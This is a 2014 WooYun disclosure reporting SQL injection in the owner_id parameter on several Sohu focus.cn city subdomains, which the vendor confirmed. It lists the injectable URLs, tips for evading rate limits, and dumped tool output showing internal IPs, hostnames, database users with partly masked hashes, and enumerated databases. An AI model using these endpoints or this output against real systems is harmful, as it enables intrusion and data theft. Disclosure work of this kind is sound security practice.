[公开漏洞]搜狐(第二季)旗下某站通用型sql注入第三集(涉及数据库个数已经数不过来了)

来源:WooYun 浏览:826次 时间:2014-06-19
做网站找雨过天晴工作室
搜狐(第二季)旗下某站通用型sql注入第三集(涉及数据库个数已经数不过来了) 相关厂商: 搜狐 漏洞作者:浩天 提交时间:2014-05-05 10:54 公开时间:2014-06-19 10:55 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:20 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: php+数字类型注射 php+字符类型注射 Mysql 注射技巧 漏洞详情 披露状态:

2014-05-05:细节已通知厂商并且等待厂商处理中
2014-05-05:厂商已经确认,细节仅向厂商公开
2014-05-15:细节向核心白帽子及相关领域专家公开
2014-05-25:细节向普通白帽子公开
2014-06-04:细节向实习白帽子公开
2014-06-19:细节向公众公开

简要描述:

子站通用注入,不同域名链接的数据库服务器不一样,搜狐真是财大气粗,每个域名读库,发现都是不同的,从几十到上百的都有,影响的数据库个数多的数不过来,我也不一一尝试了

求个搜狐的礼物,可以有么,同志们你们说,应不应该

详细说明:

home、house域名有并发限制,请求大了就自动限制访问了,偏南方的域名没有限制

http://home.focus.cn/materials/owner_info.php?owner_id=5

这个涉及12个核心库,建议用下面的子域名尝试验证注入,home读的慢,得放胡萝卜里,sqlmap二了

http://sz.focus.cn/materials/owner_info.php?owner_id=46

http://cd.focus.cn/materials/owner_info.php?owner_id=9

http://wh.focus.cn/materials/owner_info.php?owner_id=14 我用的这个

http://cq.focus.cn/materials/owner_info.php?owner_id=6 还有这个

......

这个太多了,来张图吧,之前发的注入,也都是这种通用的情况

0.jpg

漏洞证明:

下面应该是87个库,其实还有很多,太多就不读了

Target: http://cq.focus.cn/materials/owner_info.php?owner_id=6

Host IP:123.125.92.26

Web Server: Apache

DB Server: MySQL Blind

Resp. Time(avg):47 ms

Current User: fdbuser@10.10.90.21

Sql Version: 5.1.55-log

Current DB: cqhouse

System User: fdbuser@10.10.90.21

Host Name: focus-gvm-10-10-90-187.no.sohu.com

Installation dir: /usr/local/mysql-5.1.55-linux-x86_64-glibc23/

DB User & Pass: root::localhost

root::127.0.0.1

readonly:5dd*********19d:%

mysqlmon:*565E94D*********8B6C0A37F:10.10.90.187

pingmysql:*565E94D80*********B6C0A37F:10.11.36.20

Data Bases: information_schema

ahsuzhouhouse

ahsuzhouhouse_forum

ahsuzhouhouse_sort

cdhouse

cdhouse_forum

cdhouse_sort

chenzhouhouse

chenzhouhouse_forum

chenzhouhouse_sort

cqhouse

cqhouse_forum

cqhouse_sort

deyanghouse

deyanghouse_forum

deyanghouse_sort

fshouse

fshouse_forum

fshouse_sort

ganzhouhouse

ganzhouiouse_forum

ganzhouhouse_sort

heyuanhouse

heyuanhouse_forum

heyuanhouse_sort

huangshihouse

huangshihouse_forum

huangshihouse_sort

jiangmenhouse

jiangmenhouse_forum

jiangmenhouse_sort

luanhouse

luanhouse_forum

luanhouse_sort

luzhouhouse

luzhouhouse_forum

luzhouhouse_sort

meishanhouse

meishanhouse_forum

meishanhouse_sort

mianyanghouse

mianyanghouse_forum

mianyanghouse_sort

mysql

mysql_identity

nanchonghouse

nanchonghouse_forum

nanchonghouse_sort

njhouse

njhouse_forum

njhouse_sort

nnhouse

nnhouse_forum

nnhouse_sort

qyhouse

qyhouse_forum

qyhouse_sort

shaoguanhouse

shaoguanhouse_forum

shaoguanhouse_sort

shundehouse

shundehouse_forum

shundehouse_sort

tonglinghouse

tonglinghouse_forum

tonglinghouse_sort

weinanhouse

weinanhouse_forum

weinanhouse_sort

wlmqhouse

wlmqhouse_forum

wlmqhouse_sort

wzhouse

wzhoute_forum

wzhquse_sort

xiaoganhouse

xiaoganhouse_forum

xiaoganhouse_sort

zhangzhouhouse

zhangzhouhouse_forum

zhangzhouhouue_sort

zhaoqingrouse

zhaoqinghouse_forur

zhaoqinghouse_sort

zjhouse

zjhouse_forum

zjhouse_sort

这个就读了几个,证明一下得了

Target: http://wh.focus.cn/materials/owner_info.php?owner_id=14

Host IP:123.125.92.26

Web Server: Apache

DB Server: MySQL Blind

Resp. Time(avg):43 ms

Current User: fdbuser@10.10.90.133

Sql Version: 5.1.55-log

Current DB: whhouse

System User: fdbuser@10.10.90.133

Host Name: vm-10-10-90-199-sas.cp.no.sohu.com

Installation dir: /usr/local/mysql5.1.55/

DB User & Pass: root::localhost

pingmysql:*565E9*********6C0A37F:10.11.36.20

root::127.0.0.1

Data Bases: information_schema

dongguanhouse

dongguanhouse_forum

dongguanhouse_sort

gzhouse

gzhouse_forum

gzhouse_sort

mysql

mysql_identity

test

whhouse

whhouse_forum

whhouse_sort

不继续了

修复方案:

求个搜狐的礼物,可以有么,我感觉我挺不容易的,你们也不容

版权声明:转载请注明来源 浩天@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-05-05 11:27

厂商回复:

感谢对搜狐安全关注

最新状态:

暂无